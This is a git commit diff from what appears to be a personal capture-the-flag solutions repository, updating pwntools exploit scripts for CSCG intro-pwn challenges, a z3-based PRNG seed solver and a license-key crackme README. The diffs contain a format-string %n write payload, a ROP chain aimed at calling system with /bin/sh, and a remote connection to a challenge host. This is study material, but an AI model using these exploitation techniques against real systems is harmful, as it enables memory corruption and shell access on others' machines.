This commit is contained in:
2025-03-24 22:08:34 +01:00
parent 04a5de372e
commit f8f73b47ef
14 changed files with 52 additions and 12 deletions

2
.gitignore vendored
View File

@@ -11,3 +11,5 @@ insomnihack24/web/mathematical/.venv/
.venv
__pycache__
core.*

Binary file not shown.

Binary file not shown.

View File

@@ -9,7 +9,7 @@ LOCAL = True # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("39d9389ef3a77235a475377e-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
p = remote("75143f5062f22bfeb9302387-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
@@ -21,11 +21,22 @@ def interact():
bug_addr = 0x40406c
# Example interaction
recv_until(b'What is your name?')
payload = b"%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n"
format_string = b""
format_string += b"%0.0s" * 5
format_string += b"%0.0s" * 10
format_string += b"%n"
format_string += b"\n" * (8 - (len(format_string) % 8))
print(len(format_string) / 8)
format_string += p64(bug_addr)
print(format_string)
print("enter if gdb attached")
input()
send_payload(payload)
send_payload(format_string)
interact() # Keep the shell open

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@@ -39,7 +39,7 @@ def interact():
ropchain = [
b"3", b"2", b"6", b"13", b"12", b"11", b"1", b"-1"
b"3", b"2", b"6", b"13", b"12", b"-1"
]

View File

@@ -7,5 +7,4 @@ r10 = binsh_puts_diff
6 -> rax = 0, rsi = 0
13 -> rdi = trash, rsi = puts
12 -> rcx = binsh
11 -> r8 = r9, r9 = r8
1 -> rbx = system

View File

@@ -0,0 +1,20 @@
# A custom template for binary exploitation that uses pwntools.
# Examples:
# python exploit.py DEBUG NOASLR GDB
# python exploit.py DEBUG REMOTE
from pwn import *
with process("./challenge") as p:
print(p.recvuntil(b'>').decode())
p.sendline("1".encode())
print(p.recvuntil(b'>').decode())
for i in range(3000):
p.sendline("1".encode())
print(p.recvuntil(b'>').decode())
p.sendline(b"584057")
print(p.recvline())
p.interactive()

View File

@@ -6,9 +6,16 @@ import sys
def ROL(X, N):
if isinstance(X, z3.BitVecRef):
return z3.RotateLeft(X,N)
else:
return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64))
def ROR(X, N):
if isinstance(X, z3.BitVecRef):
return z3.RotateRight(X,N)
else:
return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64))
def custom_random(state):

View File

@@ -24,6 +24,7 @@ def get_seed_for_sequence(bytesequence):
s = z3.Solver()
base_state = z3.BitVec("base_state", 64)
cur_state = base_state
s.add(base_state > 0)
for byte in bytesequence:
gen_byte, cur_state = custom_random(cur_state)
s.add(gen_byte == byte)
@@ -44,7 +45,7 @@ def gen_sequence(seed, length):
return bytes(r)
test = random.getrandbits(32).to_bytes(4)
test = random.getrandbits(32).to_bytes(4, "little")
seed = get_seed_for_sequence(test)
print(seed)
print(test)

View File

@@ -7,11 +7,11 @@ The license key has the form XXXXX-XXXXX-XXXXX-XXXXX
The template code will mostly ignore the '-' (since the binary does it mostly as well) and `license[5]` will refer to the 6th X
For context:
- The binary will perform some general constraint checks on the license
- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed
- The constraints are described in the template and the relevant arrays extracted already
To validate your license key, run the binary (it requires qemu and some dependencies, so using the Dockerfile might be easiest):
Build: `docker build -t archventure .`